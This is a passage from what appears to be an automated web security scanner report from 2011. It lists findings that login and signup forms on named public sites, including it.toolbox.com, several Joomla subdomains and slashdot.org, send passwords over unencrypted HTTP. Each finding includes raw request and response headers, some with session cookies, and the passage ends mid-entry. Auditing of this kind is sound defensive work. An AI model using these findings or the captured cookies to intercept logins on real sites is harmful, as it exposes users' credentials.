<form name="aspnetForm" method="post" action="/blogs/database-talk" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.35. http://it.toolbox.com/blogs/db2luw

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2luw

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/db2luw
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/db2luw" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.36. http://it.toolbox.com/blogs/db2zos

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/db2zos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/db2zos
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78332
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/db2zos" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.37. http://it.toolbox.com/blogs/elsua

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/elsua

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/elsua
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64411
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/elsua" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.38. http://it.toolbox.com/blogs/juice-analytics

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/juice-analytics

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/juice-analytics
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61828
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/juice-analytics" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.39. http://it.toolbox.com/blogs/minimalit

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/minimalit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/minimalit
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60086
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/minimalit" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.40. http://it.toolbox.com/blogs/penguinista-databasiensis

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/penguinista-databasiensis

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/penguinista-databasiensis
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46021
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/penguinista-databasiensis" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.41. http://it.toolbox.com/blogs/ppmtoday

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://it.toolbox.com/blogs/ppmtoday
The form contains the following password field:
  • ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

6.42. http://joomlacode.org/gf/account/

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/account/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://joomlacode.org/gf/account/?action=UserAddAction
The form contains the following password fields:
  • password
  • password_confirm

Request

GET /gf/account/?action=UserAdd HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.3.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:36:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
</p>
<form action="/gf/account/?action=UserAddAction" method="POST">
   <table border="0">
...[SNIP]...
<br />
           <input type="password" name="password" maxlength="32" value="" /></td>
...[SNIP]...
<br />
           <input type="password" name="password_confirm" maxlength="32" value="" /></td>
...[SNIP]...

6.43. http://my.joomla.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://my.joomla.org/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: my.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9eaf6601670c0ef4fb11c453b34b19f8=ad1bd55b950dc34700e6681bcc93141e; path=/
Last-Modified: Mon, 24 Jan 2011 22:43:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p>
       <form action="index.php" method="post" name="login" id="form-login">
   <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" class="inputbox" size="18" alt="Password" id="passwd" />
       </p>
...[SNIP]...

6.44. http://netvouz.com/action/submitBookmark

Summary

Severity:   High
Confidence:   Certain
Host:   http://netvouz.com
Path:   /action/submitBookmark

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://netvouz.com/action/submitBookmark
The form contains the following password field:
  • password

Request

GET /action/submitBookmark HTTP/1.1
Host: netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:42 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=0000e0ie9rZuNgE43J-9RQD-aOC:-1; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5096


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</p>

           
                       <form name="submitBookmarkForm" method="post" action="/action/submitBookmark">
               <table>
...[SNIP]...
<td><input type="password" name="password" maxlength="15" size="18" tabindex="2" value="" /></td>
...[SNIP]...

6.45. http://newsguy.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsguy.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://newsguy.com/javascript:LoginNow()
The form contains the following password field:
  • pass

Request

GET / HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:34 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07e5e76216ca9266b6006a1955c20780; path=/
Content-Length: 35166
Cache-Control: private
Content-Type: text/html

<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>

<title>Welcome to Newsguy!</title>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<table border="0" cellpadding="0" cellspacing="0" width="283" height="37" style="font-family: Arial; font-size: 80%;">
<form name=loginform method=POST action="javascript:LoginNow()">
<tr>
...[SNIP]...
<td width="77" height="22" align="left">
<input type="password" name="pass" size="8"></td>
...[SNIP]...

6.46. http://people.joomla.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://people.joomla.org/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div class="highslide-body">

<form action="/index.php"
   method="post" name="cd_login_form_login" id="cd_login_form_login">

<fieldset class="input">
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox"
   size="18"
   title="Password"
   alt="password" />
</p>
...[SNIP]...

6.47. http://people.joomla.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://people.joomla.org/people.html
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>

   <form action="/people.html" method="post" name="login" id="form-login" >
<label>
...[SNIP]...
<br />
<input type="password" class="inputbox frontlogin" name="passwd" id="password" />
</label>
...[SNIP]...

6.48. http://people.joomla.org/groups/viewdiscussion/996-Joomla®%2016%20Has%20Arrived.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://people.joomla.org/groups.html
The form contains the following password field:
  • passwd

Request

GET /groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=4f8b70569285b3c4a1fb98ed7e94a635; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html; expires=Tue, 25-Jan-2011 22:47:59 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:48:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div class="highslide-body">

<form action="/groups.html"
   method="post" name="cd_login_form_login" id="cd_login_form_login">

<fieldset class="input">
...[SNIP]...
<br />
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox"
   size="18"
   title="Password"
   alt="password" />
</p>
...[SNIP]...

6.49. http://resources.joomla.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://resources.joomla.org/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.50. http://resources.joomla.org/directory/advsearch.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/advsearch.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://resources.joomla.org/directory.html
The form contains the following password field:
  • passwd

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.51. http://resources.joomla.org/directory/new.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/new.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://resources.joomla.org/directory.html
The form contains the following password field:
  • passwd

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/directory.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.52. http://resources.joomla.org/how-to-add-listings.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /how-to-add-listings.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://resources.joomla.org/how-to-add-listings.html
The form contains the following password field:
  • passwd

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</h3>
                   <form action="/how-to-add-listings.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.53. http://slashdot.org/bookmark.pl

Summary

Severity:   High
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://slashdot.org/login.pl
The form contains the following password field:
  • upasswd

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '12
...[SNIP]...
<div id="login_box_content">
<form action="//slashdot.org/login.pl" method="post">
<fieldset>
...[SNIP]...
<input type="hidden" name="op" value="userlogin">
   <input type="password" name="upasswd" size="20">
   <label class="checkbox">
...[SNIP]...

6.54. http://slashdot.org/bookmark.pl

Summary

Severity:   High
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

